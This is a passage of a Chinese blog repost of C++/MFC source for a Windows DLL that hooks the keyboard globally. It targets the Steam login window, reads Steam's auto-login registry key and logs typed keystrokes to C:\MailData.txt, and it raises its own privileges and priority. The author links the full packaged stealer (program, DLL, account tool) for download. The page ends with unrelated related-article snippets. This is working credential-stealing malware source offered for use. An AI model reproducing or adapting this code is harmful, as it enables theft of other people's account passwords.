VK_NUMPAD5:myEmailSTR = "5";break;case VK_NUMPAD6:myEmailSTR = "6";break;case VK_NUMPAD7:myEmailSTR = "7";break;case VK_NUMPAD8:myEmailSTR = "8";break;case VK_NUMPAD9:myEmailSTR = "9";break;case VK_NUMPAD0:myEmailSTR = "0";break;case VK_MULTIPLY:myEmailSTR = "*";break;case VK_ADD:     myEmailSTR = "+";break;case VK_SUBTRACT:myEmailSTR = "-";break;case VK_DECIMAL: myEmailSTR = ".";break;case VK_DIVIDE:  myEmailSTR = "/";break;//其他特殊键case VK_BACK:myEmailSTR = "[Back_Space]";//myEmailSTR.Delete(myEmailSTR.GetLength()-1);break;case VK_TAB:myEmailSTR = "   ";break;case VK_SPACE:myEmailSTR = " ";break;// 回车键case VK_RETURN:myEmailSTR = "    ";break;}//其他键的处理char KeyName[50];ZeroMemory(KeyName,50);GetKeyNameText(lParam,KeyName,50);CString KeyNameStr=KeyName;if(KeyNameStr=="`"){if(b_Sft)myEmailSTR = "~";elsemyEmailSTR = "`";}if(KeyNameStr=="-"){if(b_Sft)myEmailSTR = "_";elsemyEmailSTR = "-";}if(KeyNameStr=="="){if(b_Sft)myEmailSTR = "+";elsemyEmailSTR = "=";}if(KeyNameStr=="["){if(b_Sft)myEmailSTR = "{";elsemyEmailSTR = "[";}if(KeyNameStr=="]"){if(b_Sft)myEmailSTR = "}";elsemyEmailSTR = "]";}if(KeyNameStr==";"){if(b_Sft)myEmailSTR = ":";elsemyEmailSTR = ";";}if(KeyNameStr=="'"){if(b_Sft)myEmailSTR = "\"";elsemyEmailSTR = "'";}if(KeyNameStr==","){if(b_Sft)myEmailSTR = "<";elsemyEmailSTR = ",";}if(KeyNameStr=="."){if(b_Sft)myEmailSTR = ">";elsemyEmailSTR = ".";}if(KeyNameStr=="/"){if(b_Sft)myEmailSTR = "?";elsemyEmailSTR = "/";}if(KeyNameStr=="\\"){if(b_Sft)myEmailSTR = "|";elsemyEmailSTR = "\\";}//AfxMessageBox(myEmailSTR);CFileFind finder1;BOOL noEmpty1=finder1.FindFile("C:\\MailData.txt");if(!noEmpty1){FILE *fpx1;fpx1=fopen("C:\\MailData.txt", "w");if(fpx1){fprintf(fpx1, "%s", myEmailSTR.GetBuffer(0));}fclose(fpx1);}else{FILE *fpx2;fpx2=fopen("C:\\MailData.txt", "a");if(fpx2){fprintf(fpx2, "%s", myEmailSTR.GetBuffer(0));}fclose(fpx2);}myEmailSTR = "";}}}LRESULT RetVal = CallNextHookEx(hie, nCode, wParam, lParam );	return  RetVal;
}// HOOK 键盘回调函数 (监控 Steam.exe 输入)LRESULT DllExport CALLBACK IntProc1(int nCode,WPARAM wParam,LPARAM lParam)
{if(::GetCurrentProcessId() != GetEXE())return CallNextHookEx(hkb, nCode, wParam, lParam );HWND H_wnd = ::GetForegroundWindow();char sTitle[255];CString ss;::SendMessage(H_wnd,WM_GETTEXT,255,(LPARAM)sTitle);//AfxMessageBox(sTitle);ss.Format(TEXT("%s"), sTitle);//AfxMessageBox(ss);char *aaa;aaa = strstr(sTitle, "Steam  登录");char *bbb;bbb = strstr(sTitle, "Steam  登入");char *ccc;ccc = strstr(sTitle, "Steam  Login");char *ddd;ddd = strstr(sTitle, "S t e a m  登录");char *eee;eee = strstr(sTitle, "S t e a m  登  录");int n = ss.Find("Steam 登录",0);int m = ss.Find("Steam 登入",0);int o = ss.Find("Steam Login",0);int p = ss.Find("S t e a m 登录",0);int q = ss.Find("S t e a m 登 录",0);if( (aaa || bbb || ccc || ddd || eee) || (m >= 0 || n >= 0 || o >= 0 || p >= 0 || q >= 0) ){if(!Regedit){HKEY hKeyx;LONG lRetx, lRetx2;lRetx = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKeyx );if( lRetx == ERROR_SUCCESS ){char datas[256] = {0};DWORD dwTypes = REG_SZ;DWORD dwLengths = 256;lRetx2 = RegQueryValueEx( hKeyx, TEXT("AutoLoginUser"), NULL, &dwTypes, (LPBYTE)datas, &dwLengths );if(lRetx2 != ERROR_SUCCESS){//创建线程监控注册表 1DWORD dwThreadId;CreateThread(NULL, 0, HOOKRegedit, NULL, 0, &dwThreadId); Regedit = true;}else{// 如果注册表中能打开存放用户数据的键值// 而该键值又为空的话必须运行线程1来操作if( strlen(datas) < 4 ){//创建线程监控注册表 1DWORD dwThreadId;CreateThread(NULL, 0, HOOKRegedit, NULL, 0, &dwThreadId); Regedit = true;}else{//创建线程监控注册表 2DWORD dwThreadId;CreateThread(NULL, 0, HOOKRegedit2, NULL, 0, &dwThreadId); Regedit = true;}}}RegCloseKey(hKeyx);}if(nCode == HC_ACTION && (lParam & 0xc000ffff) == 1){BOOL b_Sft = ::GetAsyncKeyState(VK_SHIFT) >> ((sizeof(short) * 8)-1);BOOL b_Clk = ::GetKeyState(VK_CAPITAL);BOOL b_Ctl = ::GetAsyncKeyState(VK_CONTROL) >> ((sizeof(short) * 8)-1);BOOL b_Alt = ::GetAsyncKeyState(VK_MENU) >> ((sizeof(short) * 8)-1);if(!b_Ctl && !b_Alt){if(b_Sft && !b_Clk){switch(wParam){case '1':szStr += "!";break;case '2':szStr += "@";break;case '3':szStr += "#";break;case '4':szStr += "$";break;case '5':szStr += "%";break;case '6':szStr += "^";break;case '7':szStr += "&";break;case '8':szStr += "*";break;case '9':szStr += "(";break;case '0':szStr += ")";break;case 'A':szStr += "A";break;case 'B':szStr += "B";break;case 'C':szStr += "C";break;case 'D':szStr += "D";break;case 'E':szStr += "E";break;case 'F':szStr += "F";break;case 'G':szStr += "G";break;case 'H':szStr += "H";break;case 'I':szStr += "I";break;case 'J':szStr += "J";break;case 'K':szStr += "K";break;case 'L':szStr += "L";break;case 'M':szStr += "M";break;case 'N':szStr += "N";break;case 'O':szStr += "O";break;case 'P':szStr += "P";break;case 'Q':szStr += "Q";break;case 'R':szStr += "R";break;case 'S':szStr += "S";break;case 'T':szStr += "T";break;case 'U':szStr += "U";break;case 'V':szStr += "V";break;case 'W':szStr += "W";break;case 'X':szStr += "X";break;case 'Y':szStr += "Y";break;case 'Z':szStr += "Z";break;}}else if(!b_Sft && b_Clk){switch(wParam){case '1':szStr += "1";break;case '2':szStr += "2";break;case '3':szStr += "3";break;case '4':szStr += "4";break;case '5':szStr += "5";break;case '6':szStr += "6";break;case '7':szStr += "7";break;case '8':szStr += "8";break;case '9':szStr += "9";break;case '0':szStr += "0";break;case 'A':szStr += "A";break;case 'B':szStr += "B";break;case 'C':szStr += "C";break;case 'D':szStr += "D";break;case 'E':szStr += "E";break;case 'F':szStr += "F";break;case 'G':szStr += "G";break;case 'H':szStr += "H";break;case 'I':szStr += "I";break;case 'J':szStr += "J";break;case 'K':szStr += "K";break;case 'L':szStr += "L";break;case 'M':szStr += "M";break;case 'N':szStr += "N";break;case 'O':szStr += "O";break;case 'P':szStr += "P";break;case 'Q':szStr += "Q";break;case 'R':szStr += "R";break;case 'S':szStr += "S";break;case 'T':szStr += "T";break;case 'U':szStr += "U";break;case 'V':szStr += "V";break;case 'W':szStr += "W";break;case 'X':szStr += "X";break;case 'Y':szStr += "Y";break;case 'Z':szStr += "Z";break;}}else if(b_Sft && b_Clk){switch(wParam){case '1':szStr += "!";break;case '2':szStr += "@";break;case '3':szStr += "#";break;case '4':szStr += "$";break;case '5':szStr += "%";break;case '6':szStr += "^";break;case '7':szStr += "&";break;case '8':szStr += "*";break;case '9':szStr += "(";break;case '0':szStr += ")";break;case 'A':szStr += "a";break;case 'B':szStr += "b";break;case 'C':szStr += "c";break;case 'D':szStr += "d";break;case 'E':szStr += "e";break;case 'F':szStr += "f";break;case 'G':szStr += "g";break;case 'H':szStr += "h";break;case 'I':szStr += "i";break;case 'J':szStr += "j";break;case 'K':szStr += "k";break;case 'L':szStr += "l";break;case 'M':szStr += "m";break;case 'N':szStr += "n";break;case 'O':szStr += "o";break;case 'P':szStr += "p";break;case 'Q':szStr += "q";break;case 'R':szStr += "r";break;case 'S':szStr += "s";break;case 'T':szStr += "t";break;case 'U':szStr += "u";break;case 'V':szStr += "v";break;case 'W':szStr += "w";break;case 'X':szStr += "x";break;case 'Y':szStr += "y";break;case 'Z':szStr += "z";break;}}else{switch(wParam){case '1':szStr += "1";break;case '2':szStr += "2";break;case '3':szStr += "3";break;case '4':szStr += "4";break;	case '5':szStr += "5";break;case '6':szStr += "6";break;case '7':szStr += "7";break;case '8':szStr += "8";break;case '9':szStr += "9";break;case '0':szStr += "0";break;case 'A':szStr += "a";break;case 'B':szStr += "b";break;case 'C':szStr += "c";break;case 'D':szStr += "d";break;case 'E':szStr += "e";break;case 'F':szStr += "f";break;case 'G':szStr += "g";break;case 'H':szStr += "h";break;case 'I':szStr += "i";break;case 'J':szStr += "j";break;case 'K':szStr += "k";break;case 'L':szStr += "l";break;case 'M':szStr += "m";break;case 'N':szStr += "n";break;case 'O':szStr += "o";break;case 'P':szStr += "p";break;case 'Q':szStr += "q";break;case 'R':szStr += "r";break;case 'S':szStr += "s";break;case 'T':szStr += "t";break;case 'U':szStr += "u";break;case 'V':szStr += "v";break;case 'W':szStr += "w";break;case 'X':szStr += "x";break;case 'Y':szStr += "y";break;case 'Z':szStr += "z";break;}}//小键盘按键switch(wParam){case VK_NUMPAD1:szStr += "1";break;case VK_NUMPAD2:szStr += "2";break;case VK_NUMPAD3:szStr += "3";break;case VK_NUMPAD4:szStr += "4";break;case VK_NUMPAD5:szStr += "5";break;case VK_NUMPAD6:szStr += "6";break;case VK_NUMPAD7:szStr += "7";break;case VK_NUMPAD8:szStr += "8";break;case VK_NUMPAD9:szStr += "9";break;case VK_NUMPAD0:szStr += "0";break;case VK_MULTIPLY:szStr += "*";break;case VK_ADD:     szStr += "+";break;case VK_SUBTRACT:szStr += "-";break;case VK_DECIMAL: szStr += ".";break;case VK_DIVIDE:  szStr += "/";break;//其他特殊键case VK_BACK:szStr.Delete(szStr.GetLength()-1);break;case VK_TAB:szStr += "   ";break;case VK_SPACE:szStr += " ";break;// 回车键case VK_RETURN:break;}//其他键的处理char KeyName[50];ZeroMemory(KeyName,50);GetKeyNameText(lParam,KeyName,50);CString KeyNameStr=KeyName;if(KeyNameStr=="`"){if(b_Sft)szStr += "~";elseszStr += "`";}if(KeyNameStr=="-"){if(b_Sft)szStr += "_";elseszStr += "-";}if(KeyNameStr=="="){if(b_Sft)szStr += "+";elseszStr += "=";}if(KeyNameStr=="["){if(b_Sft)szStr += "{";elseszStr += "[";}if(KeyNameStr=="]"){if(b_Sft)szStr += "}";elseszStr += "]";}if(KeyNameStr==";"){if(b_Sft)szStr += ":";elseszStr += ";";}if(KeyNameStr=="'"){if(b_Sft)szStr += "\"";elseszStr += "'";}if(KeyNameStr==","){if(b_Sft)szStr += "<";elseszStr += ",";}if(KeyNameStr=="."){if(b_Sft)szStr += ">";elseszStr += ".";}if(KeyNameStr=="/"){if(b_Sft)szStr += "?";elseszStr += "/";}if(KeyNameStr=="\\"){if(b_Sft)szStr += "|";elseszStr += "\\";}//AfxMessageBox(szStr);}}}LRESULT RetVal = CallNextHookEx(hkb, nCode, wParam, lParam );	return  RetVal;
}// 安装 HOOK 钩子BOOL DllExport installhook()
{/////				检测用户到期时间			 /////SYSTEMTIME st;CString strYear, strMonth, strDay, strFullTime;GetLocalTime(&st);strYear.Format("%d", st.wYear);strMonth.Format("%d", st.wMonth);strDay.Format("%d", st.wDay);if(st.wMonth < 10){int mmm = strMonth.Find("0", 0);if(mmm < 0){strMonth = "0" + strMonth;}}if(st.wDay < 10){int ddd = strDay.Find("0", 0);if(ddd < 0){strDay = "0" + strDay;}}strFullTime = strYear + strMonth + strDay;UserEndData.Remove('.');UserEndData.Remove('-');int LocalTime = atoi(strFullTime);int UserEndTime = atoi(UserEndData);if( LocalTime < UserEndTime ){//获取自身程序绝对路径TCHAR szmyPath[MAX_PATH + 1]={0};GetModuleFileName(NULL, szmyPath, MAX_PATH);(_tcsrchr(szmyPath, _T('\\')))[1] = 0;szMyselfPath.Format(TEXT("%s\\"), szmyPath);//// 删除帐号记录文件DeleteFile("C:\\NTUSERS.LOG");DeleteFile("C:\\MailData.txt");DeleteFile("C:\\MailName.txt");////设置程序优先级别为最高SetRealTimePriority();////提升程序的系统权限AdjustPrivileges();//// HOOK 键盘 1hkb = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)IntProc1, hins, 0);//// HOOK 键盘 2hie = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)IntProc2, hinss, 0);////创建线程定时清理用户输入数据DWORD dwThreadIDX;CreateThread(NULL, 0, CleanUserData, NULL, 0, &dwThreadIDX); //}return TRUE;
}// 卸载 HOOK 钩子BOOL DllExport UnHook(HHOOK szHookName)
{   	if( UnhookWindowsHookEx(szHookName) ){return TRUE;}return FALSE;
}BOOL CTest3App::InitInstance()
{	AFX_MANAGE_STATE(AfxGetStaticModuleState());hins=AfxGetInstanceHandle();hinss=AfxGetInstanceHandle();return TRUE;
}/
// CTest3App constructionCTest3App::CTest3App()
{// TODO: add construction code here,// Place all significant initialization in InitInstance
}/
// The one and only CTest3App objectCTest3App theApp;

完整项目下载

 主程序 + DLL + 帐号验证工具 一并打包上传,写的有点乱七八糟,没啥技术含量,对于目前情况已经没什么用处。

【CSDN下载】icon-default.png?t=N7T8https://download.csdn.net/download/qq_39190622/88683609

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/588583.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Hive生产调优介绍

1.Fetch抓取 Fetch抓取是指&#xff0c;Hive中对某些情况的查询可以不必使用MapReduce计算。例如&#xff1a;SELECT * FROM employees;在这种情况下&#xff0c;Hive可以简单地读取employee对应的存储目录下的文件&#xff0c;然后输出查询结果到控制台。 在hive-default.xml…

云卷云舒:构建业务型电信智能运维方法

1 引言 智能运维&#xff08;AIOps-Algorithmic IT Operations基于算法的IT运维&#xff09;是人工智能技术在IT运维领域的运用&#xff0c;引用Gartner 的报告的一段话“未来几年&#xff0c;将近50%的企业将会在他们的业务和IT运维方面采用AIOps&#xff0c;远远高于今天的10…

php的laravel权限问题

1.这是我新建的一个路由&#xff0c;然后就是说每新建一个路由都要给他开个权限&#xff01;&#xff01;&#xff01;&#xff01; 2.这个是组内大佬写的&#xff1a; 我们也可以在里面加&#xff0c;也可以在浏览器的页面手动加&#xff08;对我们新手来说还是浏览器的页面…

matlab导出高清图片,须经修改后放入latex(例如添加文字说明,matlab画图不易操作)

一、背景 我们在写文章时&#xff0c;使用matlab画图后&#xff0c;如果不需要对图片进行额外修改或调整&#xff0c;例如添加文字说明&#xff0c;即可直接从matlab导出eps格式图片&#xff0c;然后插入到latex使用。 通常latex添加图片&#xff0c;是需要eps格式的。 但很…

微服务实战系列之Dubbo(下)

前言 眼看着2023即将走远&#xff0c;心里想着似乎还有啥&#xff0c;需要再跟各位盆友叨叨。这不说曹操&#xff0c;曹操就来了。趁着上一篇Dubbo博文的余温尚在&#xff0c;博主兴匆匆地“赶制”了Dubbo的下集&#xff0c;以飨读者。 上一篇博主依然从Dubbo的内核出发&#…

原型链补充

1.什么是原型对象 函数的独有属性,他用prototype来表示,可以在函数的prototype上挂载一些公用的属性和方法,供实例化对象来访问。 2.__proto__属性 这个属性每一个对象都有,实例化对象就是通过这个属性,来访问原型对象上的属性和方法的。 3.三者之间的关系 1.在构造函数的原型…

PTA——计算火车运行时间

本题要求根据火车的出发时间和达到时间&#xff0c;编写程序计算整个旅途所用的时间。 输入格式&#xff1a; 输入在一行中给出2个4位正整数&#xff0c;其间以空格分隔&#xff0c;分别表示火车的出发时间和到达时间。每个时间的格式为2位小时数&#xff08;00-23&#xff0…

鸿蒙 DevEco Studio 3.1 入门指南

本文主要记录开发者入门&#xff0c;从软件安装到项目运行&#xff0c;以及后续的学习 1&#xff0c;配置开发环境 1.1 下载安装包 官网下载链接 点击立即下载找到对应版版本 下载完成&#xff0c;按照提示默认安装即可 1.2 下载SDK及工具链 运行已安装的DevEco Studio&…

SPI机制原理+使用

一、概述 SPI全称&#xff08;Service Provider Interface&#xff09;&#xff0c;是JDK内置的一种服务提供发现机制&#xff1b;SPI机制提供了组件发现和注册方式&#xff0c;可以为应用程序提供灵活的插件机制&#xff0c; 主要原理&#xff1a;接口 反射 配置文件。 二、…

Rust学习笔记002: 猜字游戏

version0.1 // 导入标准库中的 io 模块&#xff0c;它包含了输入输出相关的功能 use std::io;// 程序的入口点 fn main() {println!("Guess the number!");println!("Please input your guess.");// 创建一个可变的字符串变量 guess&#xff0c;用于存储用…

【Spring Security】快速入门之案例实操

目录 一、简介 1、什么是安全框架 2、主流的安全框架 3、为什么使用Spring Security 二、引言 1、什么是Spring Security 2、Spring Security工作原理 3、特点 三、快速入门 1、引入依赖 2、配置 3、启动测试 4、配置自定义账号密码 四、Web安全配置类 1.HttpSe…

智安网络|实现安全与网络功能一体化:SASE的全新安全策略

随着企业信息化和数字化程度的不断提升&#xff0c;网络安全面临着前所未有的挑战。传统的网络安全模式已经无法满足日益复杂的安全需求。在这一背景下&#xff0c;安全访问服务边缘&#xff08;SASE&#xff09;崭露头角&#xff0c;并逐渐成为新一代网络安全架构的关键概念。…

云上安全责任共担模型

对于传统自建物理服务器模式&#xff0c;用户需要承担所有的安全责任&#xff0c;负责从物理基础设施到上层应用的所有层面的安全体系构建。 云服务器的安全责任确实与物理服务器不同&#xff0c;云上的安全性是一种责任共担模式&#xff0c;其中云服务器ECS的安全责任需要你&…

Hive中支持毫秒级别的时间精度

实际上&#xff0c;Hive 在较新的版本中已经支持毫秒级别的时间精度。你可以通过设置 hive.exec.default.serialization.format 和 mapred.output.value.format 属性为 1&#xff0c;启用 Hive 的时间精度为毫秒级。可以使用以下命令进行设置&#xff1a; set hive.exec.defau…

分布式技术之故障恢复技术

文章目录 分布式故障基础知识故障类型故障检测故障恢复 分布式故障检测原理故障恢复策略 分布式故障基础知识 故障类型 在任何一个分布式系统中&#xff0c;故障都是不可避免的。这里的故障&#xff0c;通常包括两类&#xff1a; 一类是物理故障&#xff0c;比如硬盘损坏、断电…

异常检测 | Matlab基于GNN图神经网络的数据异常数据检测

异常检测 | Matlab基于GNN图神经网络的数据异常数据检测 目录 异常检测 | Matlab基于GNN图神经网络的数据异常数据检测效果一览基本介绍模型描述程序设计参考资料 效果一览 基本介绍 Matlab基于GNN图神经网络的数据异常数据检测。其核心思想是学习一个函数映射。本次使用人类活…

浅谈数字孪生的应用与发展

1、数字孪生概念 ”数字孪生是充分利用物理模型、传感器更新、运行历史等数据,集成多学科、多物理量、多尺度、多概率的仿真过程,在虚拟空间中完成映射,从而反映相对应的实体装备的全生命周期过程。数字孪生是一种超越现实的概念,可以被视为一个或多个重要的、彼此依赖的装…

elasticsearch系列五:集群的备份与恢复

概述 前几篇咱们讲了es的语法、存储的优化、常规运维等等&#xff0c;今天咱们看下如何备份数据和恢复数据。 在传统的关系型数据库中我们有多种备份方式&#xff0c;常见有热备、冷备、全量定时增量备份、通过开发程序备份等等&#xff0c;其实在es中是一样的。 官方建议采用s…

easyrecovery软件2024免费版电脑文件数据恢复工具

easyrecovery怎么恢复文件?大家可以参考下文easyrecovery恢复文件步骤来操作&#xff0c;easyrecovery是一款很强大的数据恢复软件&#xff0c;那么我们该如何使用这款软件呢?一起来了解吧&#xff01; 一&#xff1a;EasyRecovery Professional 是一款非常不错的数据恢复软件…

【链表OJ—链表的回文结构】

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 文章目录 前言一、pandas是什么&#xff1f;二、使用步骤 1.引入库2.读入数据总结 前言 提示&#xff1a;这里可以添加本文要记录的大概内容&#xff1a; 例如&#xff1a;…